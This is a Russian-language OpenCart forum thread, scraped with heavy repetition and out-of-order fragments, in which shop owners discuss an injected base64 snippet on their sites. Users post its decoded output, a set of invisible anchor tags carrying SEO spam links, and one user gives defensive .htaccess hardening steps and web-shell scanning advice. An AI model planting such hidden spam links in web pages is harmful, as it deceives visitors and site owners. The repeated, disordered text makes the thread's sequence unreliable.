href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Надіслати Поділитися на інших сайтах More sharing options... OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii'>http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii'>http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi'>http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi'>http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Хехе. Спасибо за разъяснения. У меня та же херня. Те же уроды. Похоже что есть какая то уязвимость. <a id="seolink" href="http://sofiyas.com/shop/category/platia'>http://sofiyas.com/shop/category/platia"> </a> <a id="seolink2" href="http://sofiyas.com"> </a> <a id="seolink3" href="http://sofiyas.com/shop/category/bluzki-topy"> </a> <a id="seolink4" href="http://sofiyas.com.ua"> </a> <a id="seolink5" href="http://sofiyas.com.ua"> </a> <a id="seolink6" href="http://sofiyas.com.ua"> </a> <a id="seolink7" href="http://neways.in.ua/shop/bady"> </a> <a id="seolink8" href="http://neways.in.ua/shop/bady/antioksidanty"></a> <a id="seolink9" href="http://neways.in.ua/shop/poleznye-ukrashenija/silikonovye-braslety"> </a> Как бы наказать таких? Пароли от всех доступов достаточно сложные. Весь софт на сайте только купленный есть пару модулей бесплатных. Для заливки файлов используется только 2 проверенных ftp клиента (filezilla, TC) Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 :) честно варез не качал! ) Причем вареза нет вообще у меня! На форуме недавно прозвучала фраза - а если найдем? Надіслати Поділитися на інших сайтах More sharing options... OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) :) На форуме недавно прозвучала фраза - а если найдем? Реально нет, все модули оплачены здесь же на opencartforum. При чем всем тем что купил пользуюсь уже на протяжении 2-3 лет, периодически обновляя через кабинет. Да и последние пол года ни одного модуля не обновлял. Логи по ошибкам смотрю регулярно. Эта выскочила буквально пару дней назад. Отсюда вывод - есть какая то уязвимость. Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 Есть... В слабых паролях в админку. Надіслати Поділитися на інших сайтах More sharing options... addist Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 У вас точно тут пароли и админка не причем. Такие "гадосты" творят массово. Нет смысла кому то индивидуально ломать ваш сайт и удаленно переписать библиотеку. Вы сейчас можете с легкостью переписть файл, но, "источник зла" скорее всего у вас на сайте останется. 1. Хотя, я уверен что тут админка не причем, на всякий случай - создайте новый файл .htaccess в папке admin с контентом Order deny,allow Deny from all Allow from XXX.XXX.XXX.XXX это даст вам возможность заблокировать доступ к админке из чужих ip. Здесь XXX.XXX.XXX.XXX это ваш статический ip адрес. 2. Переименуйте папку admin на что ни будь другое. Не забудьте поменять пути в файле "название новой папки/config.php" после переименования. 3. Скорее всего, у вас на сайте шеллы. Закройте доступ к php файлам кроме index.php. Для этого, открываем файл .htaccess в корне и замените # Prevent Direct Access to files <FilesMatch "\.(tpl|ini|log)"> Order deny,allow Deny from all </FilesMatch> на # Prevent Direct Access to files <FilesMatch "(?i)((\.tpl|\.ini|\.log|(?<!robots)\.txt|(?<!index)\.php))"> Order deny,allow Deny from all </FilesMatch> Этот код запрещает запускать php файлы, кроме index.php. 4. Проверяйте сайт на шеллы/бекдуры. Если у вас на сервере нет такой возможности, попросите вашего хостера сделать бекап всех ваших данных в формате zip, загрузите файлы на компьютер и просто проверяйте этот архив на вирусы. Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Допомога програмістам та розробникам Требуется помощь по response.php Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000
byrbin Опубліковано: 25 серпня 2015 Автор Share Опубліковано: 25 серпня 2015 Спасибо всем!!! честно варез не качал! ) все покупаю тут от шаблона до последнего модуля, смысла не вижу. потом заплатишь больше!!! а вот как это произошло не знаю(( Надіслати Поділитися на інших сайтах More sharing options...
markimax Опубліковано: 25 серпня 2015 Share Опубліковано: 25 серпня 2015 Если уж спалился, то не оправдываться надо было, а признаться. Да точно, потому что если бы на форуме качал только - то вирусов бы не было априори. Главное потом оплатить, если подошло то что "скачал" :) Надіслати Поділитися на інших сайтах More sharing options... 7 months later... OAVko87 Опубліковано: 16 квітня 2016 Share Опубліковано: 16 квітня 2016 (змінено) Тоже недавно схватил такое. Причем вареза нет вообще у меня! Все оплачено! Стоит ocStore 1.5.5.1.2 Интересно узнать что хоть делает эта гадость? Смотрю что конвертирует текст из одной кириллической кодировки в другую Змінено 16 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... localhost Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Надіслати Поділитися на інших сайтах More sharing options... OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii'>http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii'>http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi'>http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi'>http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Хехе. Спасибо за разъяснения. У меня та же херня. Те же уроды. Похоже что есть какая то уязвимость. <a id="seolink" href="http://sofiyas.com/shop/category/platia'>http://sofiyas.com/shop/category/platia"> </a> <a id="seolink2" href="http://sofiyas.com"> </a> <a id="seolink3" href="http://sofiyas.com/shop/category/bluzki-topy"> </a> <a id="seolink4" href="http://sofiyas.com.ua"> </a> <a id="seolink5" href="http://sofiyas.com.ua"> </a> <a id="seolink6" href="http://sofiyas.com.ua"> </a> <a id="seolink7" href="http://neways.in.ua/shop/bady"> </a> <a id="seolink8" href="http://neways.in.ua/shop/bady/antioksidanty"></a> <a id="seolink9" href="http://neways.in.ua/shop/poleznye-ukrashenija/silikonovye-braslety"> </a> Как бы наказать таких? Пароли от всех доступов достаточно сложные. Весь софт на сайте только купленный есть пару модулей бесплатных. Для заливки файлов используется только 2 проверенных ftp клиента (filezilla, TC) Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 :) честно варез не качал! ) Причем вареза нет вообще у меня! На форуме недавно прозвучала фраза - а если найдем? Надіслати Поділитися на інших сайтах More sharing options... OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) :) На форуме недавно прозвучала фраза - а если найдем? Реально нет, все модули оплачены здесь же на opencartforum. При чем всем тем что купил пользуюсь уже на протяжении 2-3 лет, периодически обновляя через кабинет. Да и последние пол года ни одного модуля не обновлял. Логи по ошибкам смотрю регулярно. Эта выскочила буквально пару дней назад. Отсюда вывод - есть какая то уязвимость. Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 Есть... В слабых паролях в админку. Надіслати Поділитися на інших сайтах More sharing options... addist Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 У вас точно тут пароли и админка не причем. Такие "гадосты" творят массово. Нет смысла кому то индивидуально ломать ваш сайт и удаленно переписать библиотеку. Вы сейчас можете с легкостью переписть файл, но, "источник зла" скорее всего у вас на сайте останется. 1. Хотя, я уверен что тут админка не причем, на всякий случай - создайте новый файл .htaccess в папке admin с контентом Order deny,allow Deny from all Allow from XXX.XXX.XXX.XXX это даст вам возможность заблокировать доступ к админке из чужих ip. Здесь XXX.XXX.XXX.XXX это ваш статический ip адрес. 2. Переименуйте папку admin на что ни будь другое. Не забудьте поменять пути в файле "название новой папки/config.php" после переименования. 3. Скорее всего, у вас на сайте шеллы. Закройте доступ к php файлам кроме index.php. Для этого, открываем файл .htaccess в корне и замените # Prevent Direct Access to files <FilesMatch "\.(tpl|ini|log)"> Order deny,allow Deny from all </FilesMatch> на # Prevent Direct Access to files <FilesMatch "(?i)((\.tpl|\.ini|\.log|(?<!robots)\.txt|(?<!index)\.php))"> Order deny,allow Deny from all </FilesMatch> Этот код запрещает запускать php файлы, кроме index.php. 4. Проверяйте сайт на шеллы/бекдуры. Если у вас на сервере нет такой возможности, попросите вашего хостера сделать бекап всех ваших данных в формате zip, загрузите файлы на компьютер и просто проверяйте этот архив на вирусы. Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Допомога програмістам та розробникам Требуется помощь по response.php
OAVko87 Опубліковано: 16 квітня 2016 Share Опубліковано: 16 квітня 2016 (змінено) Тоже недавно схватил такое. Причем вареза нет вообще у меня! Все оплачено! Стоит ocStore 1.5.5.1.2 Интересно узнать что хоть делает эта гадость? Смотрю что конвертирует текст из одной кириллической кодировки в другую Змінено 16 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options...
localhost Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Надіслати Поділитися на інших сайтах More sharing options...
OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) нехило вас поимели)))) Decode Base64 format <a id="seolink" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-geometricheskim-risunkom-tsvet-fioletovyi"> </a> <a id="seolink2" href="http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii'>http://sofiyas.com/shop/product/effektnyi-legkii-molodezhnyi-kostium-tsvet-sinii"> </a> <a id="seolink3" href="http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi'>http://sofiyas.com/shop/product/trikotazhnyi-kostium-s-nabivnym-uzorom-v-stile-retro-tsvet-krasnyi"> </a> <a id="seolink4" href="http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii'>http://sofiyas.com/shop/product/kostium-s-asimmetricheskim-tsvetnym-uzorom-tsvet-sinii"> </a> <a id="seolink5" href="http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi'>http://sofiyas.com/shop/product/trikotazhnyi-pidzhak-s-vstavkami-iz-tkani-pod-kozhu-tsvet-chernyi"> </a> <a id="seolink6" href="http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi'>http://sofiyas.com/shop/product/kotonovyi-pidzhak-v-sportivnom-stile-tsvet-salatovyi"> </a> Хехе. Спасибо за разъяснения. У меня та же херня. Те же уроды. Похоже что есть какая то уязвимость. <a id="seolink" href="http://sofiyas.com/shop/category/platia'>http://sofiyas.com/shop/category/platia"> </a> <a id="seolink2" href="http://sofiyas.com"> </a> <a id="seolink3" href="http://sofiyas.com/shop/category/bluzki-topy"> </a> <a id="seolink4" href="http://sofiyas.com.ua"> </a> <a id="seolink5" href="http://sofiyas.com.ua"> </a> <a id="seolink6" href="http://sofiyas.com.ua"> </a> <a id="seolink7" href="http://neways.in.ua/shop/bady"> </a> <a id="seolink8" href="http://neways.in.ua/shop/bady/antioksidanty"></a> <a id="seolink9" href="http://neways.in.ua/shop/poleznye-ukrashenija/silikonovye-braslety"> </a> Как бы наказать таких? Пароли от всех доступов достаточно сложные. Весь софт на сайте только купленный есть пару модулей бесплатных. Для заливки файлов используется только 2 проверенных ftp клиента (filezilla, TC) Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options...
chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 :) честно варез не качал! ) Причем вареза нет вообще у меня! На форуме недавно прозвучала фраза - а если найдем? Надіслати Поділитися на інших сайтах More sharing options... OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) :) На форуме недавно прозвучала фраза - а если найдем? Реально нет, все модули оплачены здесь же на opencartforum. При чем всем тем что купил пользуюсь уже на протяжении 2-3 лет, периодически обновляя через кабинет. Да и последние пол года ни одного модуля не обновлял. Логи по ошибкам смотрю регулярно. Эта выскочила буквально пару дней назад. Отсюда вывод - есть какая то уязвимость. Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 Есть... В слабых паролях в админку. Надіслати Поділитися на інших сайтах More sharing options... addist Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 У вас точно тут пароли и админка не причем. Такие "гадосты" творят массово. Нет смысла кому то индивидуально ломать ваш сайт и удаленно переписать библиотеку. Вы сейчас можете с легкостью переписть файл, но, "источник зла" скорее всего у вас на сайте останется. 1. Хотя, я уверен что тут админка не причем, на всякий случай - создайте новый файл .htaccess в папке admin с контентом Order deny,allow Deny from all Allow from XXX.XXX.XXX.XXX это даст вам возможность заблокировать доступ к админке из чужих ip. Здесь XXX.XXX.XXX.XXX это ваш статический ip адрес. 2. Переименуйте папку admin на что ни будь другое. Не забудьте поменять пути в файле "название новой папки/config.php" после переименования. 3. Скорее всего, у вас на сайте шеллы. Закройте доступ к php файлам кроме index.php. Для этого, открываем файл .htaccess в корне и замените # Prevent Direct Access to files <FilesMatch "\.(tpl|ini|log)"> Order deny,allow Deny from all </FilesMatch> на # Prevent Direct Access to files <FilesMatch "(?i)((\.tpl|\.ini|\.log|(?<!robots)\.txt|(?<!index)\.php))"> Order deny,allow Deny from all </FilesMatch> Этот код запрещает запускать php файлы, кроме index.php. 4. Проверяйте сайт на шеллы/бекдуры. Если у вас на сервере нет такой возможности, попросите вашего хостера сделать бекап всех ваших данных в формате zip, загрузите файлы на компьютер и просто проверяйте этот архив на вирусы. Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку
OAVko87 Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 (змінено) :) На форуме недавно прозвучала фраза - а если найдем? Реально нет, все модули оплачены здесь же на opencartforum. При чем всем тем что купил пользуюсь уже на протяжении 2-3 лет, периодически обновляя через кабинет. Да и последние пол года ни одного модуля не обновлял. Логи по ошибкам смотрю регулярно. Эта выскочила буквально пару дней назад. Отсюда вывод - есть какая то уязвимость. Змінено 17 квітня 2016 користувачем OAVko87 Надіслати Поділитися на інших сайтах More sharing options...
chukcha Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 Есть... В слабых паролях в админку. Надіслати Поділитися на інших сайтах More sharing options... addist Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 У вас точно тут пароли и админка не причем. Такие "гадосты" творят массово. Нет смысла кому то индивидуально ломать ваш сайт и удаленно переписать библиотеку. Вы сейчас можете с легкостью переписть файл, но, "источник зла" скорее всего у вас на сайте останется. 1. Хотя, я уверен что тут админка не причем, на всякий случай - создайте новый файл .htaccess в папке admin с контентом Order deny,allow Deny from all Allow from XXX.XXX.XXX.XXX это даст вам возможность заблокировать доступ к админке из чужих ip. Здесь XXX.XXX.XXX.XXX это ваш статический ip адрес. 2. Переименуйте папку admin на что ни будь другое. Не забудьте поменять пути в файле "название новой папки/config.php" после переименования. 3. Скорее всего, у вас на сайте шеллы. Закройте доступ к php файлам кроме index.php. Для этого, открываем файл .htaccess в корне и замените # Prevent Direct Access to files <FilesMatch "\.(tpl|ini|log)"> Order deny,allow Deny from all </FilesMatch> на # Prevent Direct Access to files <FilesMatch "(?i)((\.tpl|\.ini|\.log|(?<!robots)\.txt|(?<!index)\.php))"> Order deny,allow Deny from all </FilesMatch> Этот код запрещает запускать php файлы, кроме index.php. 4. Проверяйте сайт на шеллы/бекдуры. Если у вас на сервере нет такой возможности, попросите вашего хостера сделать бекап всех ваших данных в формате zip, загрузите файлы на компьютер и просто проверяйте этот архив на вирусы. Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0
addist Опубліковано: 17 квітня 2016 Share Опубліковано: 17 квітня 2016 У вас точно тут пароли и админка не причем. Такие "гадосты" творят массово. Нет смысла кому то индивидуально ломать ваш сайт и удаленно переписать библиотеку. Вы сейчас можете с легкостью переписть файл, но, "источник зла" скорее всего у вас на сайте останется. 1. Хотя, я уверен что тут админка не причем, на всякий случай - создайте новый файл .htaccess в папке admin с контентом Order deny,allow Deny from all Allow from XXX.XXX.XXX.XXX это даст вам возможность заблокировать доступ к админке из чужих ip. Здесь XXX.XXX.XXX.XXX это ваш статический ip адрес. 2. Переименуйте папку admin на что ни будь другое. Не забудьте поменять пути в файле "название новой папки/config.php" после переименования. 3. Скорее всего, у вас на сайте шеллы. Закройте доступ к php файлам кроме index.php. Для этого, открываем файл .htaccess в корне и замените # Prevent Direct Access to files <FilesMatch "\.(tpl|ini|log)"> Order deny,allow Deny from all </FilesMatch> на # Prevent Direct Access to files <FilesMatch "(?i)((\.tpl|\.ini|\.log|(?<!robots)\.txt|(?<!index)\.php))"> Order deny,allow Deny from all </FilesMatch> Этот код запрещает запускать php файлы, кроме index.php. 4. Проверяйте сайт на шеллы/бекдуры. Если у вас на сервере нет такой возможности, попросите вашего хостера сделать бекап всех ваших данных в формате zip, загрузите файлы на компьютер и просто проверяйте этот архив на вирусы. Надіслати Поділитися на інших сайтах More sharing options...
Recommended Posts